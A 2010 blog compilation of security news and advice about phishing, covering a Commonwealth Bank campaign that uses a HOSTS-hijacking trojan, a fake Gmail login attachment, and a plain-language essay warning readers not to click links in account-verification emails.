20 September 2010

Commonwealth Bank #Phishing #Australia

September 17th, 2010, 19:54 GMT| By Lucian Constantin

Security researchers from Sophos warn of an unusual phishing attack targeting Commonwealth Bank customers, which makes use of a DNS hijacking trojan to steal login details.

DNS hijacking trojan used in Commonwealth Bank phishing attackThe attack starts with spam emails abusing a real Commonwealth Bank email template, which includes the organization's logo, copyright notice and other identification elements.

The rogue messages come with a subject of “Update your Commonwealth Bank” and read: "This e-mail is to inform you that your account will be suspended within 48 hours due to your Account Inactivity."

The recipients are told that they need to confirm certain information associated with their account in order to continue using it.

A "Verify My Account Information" link is included in the email, but surprisingly, it doesn't lead to a phishing website.

Commonwealth Bank phishing email sampleInstead, it points to a file called CommBank.scr hosted on an external .cx (Christmas Islands) domain, which if ran, installs a computer trojan.

This malware's primary purpose is to phish credentials from users and it achieves this through two files dropped in the \drives\etc folder.

One is called pic.url and leads to a Commonwealth Bank phishing page. The other is a HOSTS file, which contains rogue DNS entries for the bank's domains.

This will cause all requests for commbank.com or commbank.com.au made from an infected computer to be redirected to a phishing website, which mimics the bank's login system.

Ironically, the trojan installer is also infected with a virus called Sality, suggesting that the computer of whoever is behind the phishing attack is affected by this threat.

"[…] It’s unlikely this is a deliberate measure, as we’ve seen uninfected variants of this phishing Trojan in the past (which we detect as Mal/RarHosts-A), and anyway the Sality doesn’t so much hide the Trojan as paint it in bright colours, making it even easier to spot and to block,explained Richard Cohen, a malware researcher at Sophos.

Follow the editor on Twitter @lconstantin
Copyright © 2001-2010 Softpedia. Contact/Tip us at 

09 September 2010

Gone #Phishing and your the fish!

Believe it or not, there are rascals inhabiting this very planet, their consequence emanates from under the woodwork everywhere, and arrives without warning at your inbox.
These communiqués, in the form of emails, are simply the result of people who have gone “phishing,” not to be confused with the term “gone fishing,” a practice no one seems to object to except maybe the fish. Still these rogues are after a fish, and the fish my friend is you!
Phishing employs both technical schemes and reliance on your lack of caution, to gain your personal identity and financial information data.
The way they hook their victim is through a cloaked link (the bait) leading their unsuspecting fish, that’s you, to a counterfeit website carefully designed to trick their catch (you) into divulging private financial data such as, credit card numbers, usernames, passwords, social security numbers, and so forth.
These traps are intermingled with everyday spam, or whatever passes as spam, littering your inbox. In reality, ordinary spam is merely bothersome at worst, requiring its disposal through excessive use of the delete key, yet phishing can be far more destructive.
These deceptive ploys fraught with harmful intentions are daily appearing in mail boxes everywhere, arriving from outside and inside the country highlighting the Internets lack of policing and our peril.
An email message can be a useful and handy tool, yet it’s tailor-made for this type of villain. The reminder you receive can appear as a genuine concern from a business you are doing commerce with, and have already entrusted your personal information.
The subject line of these bogus emails reads something like, “We suspect an unauthorized transaction on your account,” then sets the hook by declaring only “good intentions” by stating, “To ensure your account is not compromised, please click the link below and confirm your identity.”
Or, the phony email might assert that, “During our regular verification of accounts we couldn’t verify your information.” This phrase is calculated to put you into a panic, then comes the bait, please click here to update and verify your information.” And, if you do, they win!
And yes, I am not too proud to admit a close friend of mine, in his newbie days, fell prey to this blatant deception. Come to think of it, his name and description is curiously the same as mine. Oh well, I know it couldn’t have been me, as I wouldn’t fall for such a ruse. Then again!
Following this incident, I have developed a simple rule, I never respond through any email allegedly from anyone I’m doing business with, regardless of my lack of suspicion. Where I feel it’s of proper concern, I go directly through my browser to the site, enter and check it out.
This advice I offer you like a brother, never react directly with any message that poses a serious concern and provides a “convenient” link for you to deposit your critical information. It could be the most costly mistake of your life.
While there are sites where you can forward these poison pills, your only real protection, is you. Don’t rely on any company, notwithstanding their plausible concerns, for in the end, you retain the power of the delete button, use it wisely.
By the bye, phishing is often referred to as “spoofing,” what a harmless expression. As if, “sure I stole your identity, cleaned out your bank account, left you with huge financial losses to overcome, but hey, I was only spoofing!”


Gmail #phishing campaign is under way

Fake notices inviting Gmail users to update their Google account information have lately been hitting inboxes around the world, warnsSunbelt.

Purportedly coming from the "Google Team", the rather legitimate-looking message tries to make the users download and open the attached Gmail_access.html file, which when opened in a browser presents a very realistic, but fake version of the Gmail login page:

If it looks realistic, it is because it loads certain graphic elements from the legitimate Gmail page, but a peek at the source code of the page reveals that the entered information gets sent to a script hosted on a domain registered in Serbia.

Source: http://www.net-security.org/secworld.php?id=9842